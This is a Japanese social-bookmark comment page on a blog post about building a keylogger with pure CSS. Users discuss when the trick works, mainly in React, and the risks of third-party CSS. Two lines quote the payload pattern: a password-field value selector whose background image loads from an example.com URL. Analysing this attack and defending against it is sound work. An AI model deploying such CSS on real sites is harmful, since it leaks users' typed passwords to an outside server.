記事へのコメント46

    • 人気コメント
    • 新着コメント
    cartman0 cartman0 value attributeはinputの初期値で、入力値はvalue propertyで管理されるから結局cssじゃ見えないのね

    2018/03/31 リンク

    その他
    Dai_Kamijo Dai_Kamijo “CSSだけでキーロガーを作る - R42日記” — 徳丸 浩 (@ockeghem) February 27, 2018 from Twitter https://twitter.com/Dai_Kamijo March 02, 2018 at 05:29PM via IFTTT

    2018/03/02 リンク

    その他
    takryou79 takryou79 CSS

    2018/03/01 リンク

    その他
    hinaloe hinaloe あー最初出てきた記事で特定のライブラリ〜〜って何の話かとおもったけどなるほどReactでは起こりえてもvueだと普通は発生しないってことか〜〜

    2018/02/28 リンク

    その他
    flying-cat flying-cat Reactやないか

    2018/02/28 リンク

    その他
    sgo2 sgo2 カーソルキーで入力位置を変えながら入力すれば防げるような。(Keepassにはそうやって入力する機能がある)

    2018/02/28 リンク

    その他
    takuya_1st takuya_1st CSS で *[value] 取れたのか。。。その仕様はあぶないし、コピペ禁止はかえって危険で間違ってない。コピペ禁止フォーム滅びろ

    2018/02/28 リンク

    その他
    suquiya0 suquiya0 いろんなテクニックがあるものだ。

    2018/02/28 リンク

    その他
    yuki_2021 yuki_2021 いろんなことを考えるもんだ

    2018/02/28 リンク

    その他
    lbtmplz lbtmplz フェーン

    2018/02/28 リンク

    その他
    teihengrammer teihengrammer こええなこれ・・・

    2018/02/28 リンク

    その他
    kns_1234 kns_1234 やっぱりReactの実装が悪いということか。

    2018/02/28 リンク

    その他
    kusigahama kusigahama 「パスワードの手入力は危険」の一根拠くらいにはなるかな

    2018/02/28 リンク

    その他
    rryu rryu 普通は入力したものが即座にvalue属性に反映されたりしないから大丈夫なのか。

    2018/02/28 リンク

    その他
    Chinosoko Chinosoko [value$="a"]←「末尾がa」のセレクタ…使った事ない。同じ文字の二つ目以降が検出できない?とはいえ、場合の数はかなり絞られるので、現実的な脅威か。インジェクションじゃなくて、外部の.cssファイルその物が脅威に。

    2018/02/28 リンク

    その他
    kibitaki kibitaki わあ。ギミックだ。

    2018/02/28 リンク

    その他
    lifeisadog lifeisadog ソースのサイトが言ってるのは「Third party CSS」は安全ではない、つまり外部サイトのCSS(画像やJSも)を安全だと仮定するのは危険、と言ってるだけ。

    2018/02/28 リンク

    その他
    Cherenkov Cherenkov React等 key logger キーロガー input[type="password"][value$="a"] { background-image: url("http://example.com/a")

    2018/02/28 リンク

    その他
    diveintounlimit diveintounlimit 今はどうなってるか知らないけど、以前はCSS経由のアクセスはキャッシュされなくて同じ文字をタイプしてもログできたよ。

    2018/02/28 リンク

    その他
    taguch1 taguch1 ほーー。いろんなこと考えるなぁ

    2018/02/28 リンク

    その他
    hapilaki hapilaki これに関しては、CSSをブロックせずとも画像表示をブロックしてアクセスすれば対策できるんじゃないかな、知らんけど。

    2018/02/28 リンク

    その他
    ledsun ledsun reactでvalue値を毎回属性に反映したい(vdomとdomを乖離させたくない)気持ちはわかる。常にvalueを連動させる必要があるかどうかは謎。不要ならvalueだけ特別扱いすればいいのよね。

    2018/02/28 リンク

    その他
    motchang motchang ブコメ

    2018/02/28 リンク

    その他
    manabou manabou ][security][keylogger]

    2018/02/28 リンク

    その他
    sky-graph sky-graph キャッシュが効くとしても、使用文字の種類は知られてしまいそうだ。ブラウザの非アクティブなタブだと動作しないのかな

    2018/02/28 リンク

    その他
    yoshikidz yoshikidz ちょい無理がありそうで逆に良かった感

    2018/02/28 リンク

    その他
    THAL THAL 実際使えるかどうかは別として面白いアプローチ

    2018/02/28 リンク

    その他
    YarmUI YarmUI Service Workersとセットで使えば・・・

    2018/02/28 リンク

    その他
    sai0ias sai0ias これブラウザ側でpasswordの中身検知しないようになってるはずだし、これ埋め込まれるって超限定的な気がする。改竄とかするならもっと分かりやすい方法取るだろうし。

    2018/02/28 リンク

    その他
    teppeis teppeis 同じアイデアは既にweb fontで実現されてたし、3rd party cssの危険性が急に上がったわけではない / この攻撃はattributeを変更するReact等特定ライブラリ上しか動かない / https://jakearchibald.com/2018/third-party-css-is-not-safe/

    2018/02/28 リンク

    その他

    関連記事

    CSSだけでキーロガーを作る(※追記あり) - R42日記

    github.com よくもまあこんなこと思いついたなw 要するに、 input[type="password"][value$="a"] { back...

    ブックマークしたユーザー

    • cartman02018/03/31 cartman0
    • texta2018/03/15 texta
    • TakayukiN6272018/03/05 TakayukiN627
    • sawarabi01302018/03/04 sawarabi0130
    • donotthinkfeel2018/03/03 donotthinkfeel
    • Dai_Kamijo2018/03/02 Dai_Kamijo
    • tokishi482018/03/02 tokishi48
    • l-_-ll2018/03/02 l-_-ll
    • littlefield2018/03/01 littlefield
    • seikenn2018/03/01 seikenn
    • riyokotter2018/03/01 riyokotter
    • tact_tomi2018/03/01 tact_tomi
    • subak2018/03/01 subak
    • Exocet2018/03/01 Exocet
    • takryou792018/03/01 takryou79
    • kjw_junichi2018/03/01 kjw_junichi
    • naokik2018/03/01 naokik
    • technopocket2018/03/01 technopocket
    すべてのユーザーの
    詳細を表示します

    同じサイトの新着

    同じサイトの新着をもっと読む

    いま人気の記事

    いま人気の記事をもっと読む

    いま人気の記事 - テクノロジー

    いま人気の記事 - テクノロジーをもっと読む

    新着記事 - テクノロジー

    新着記事 - テクノロジーをもっと読む

    新聞を読んでいると どの新聞も日曜日に本の特集記事が掲載され… - 人力検索はてな

    1 user https://q.hatena.ne.jp/

    Jenkins 1.641 / Jenkins 1.625.3 からContent-Security-Policyが設定された - R42日記

    3 users https://takahashikzn.root42.jp/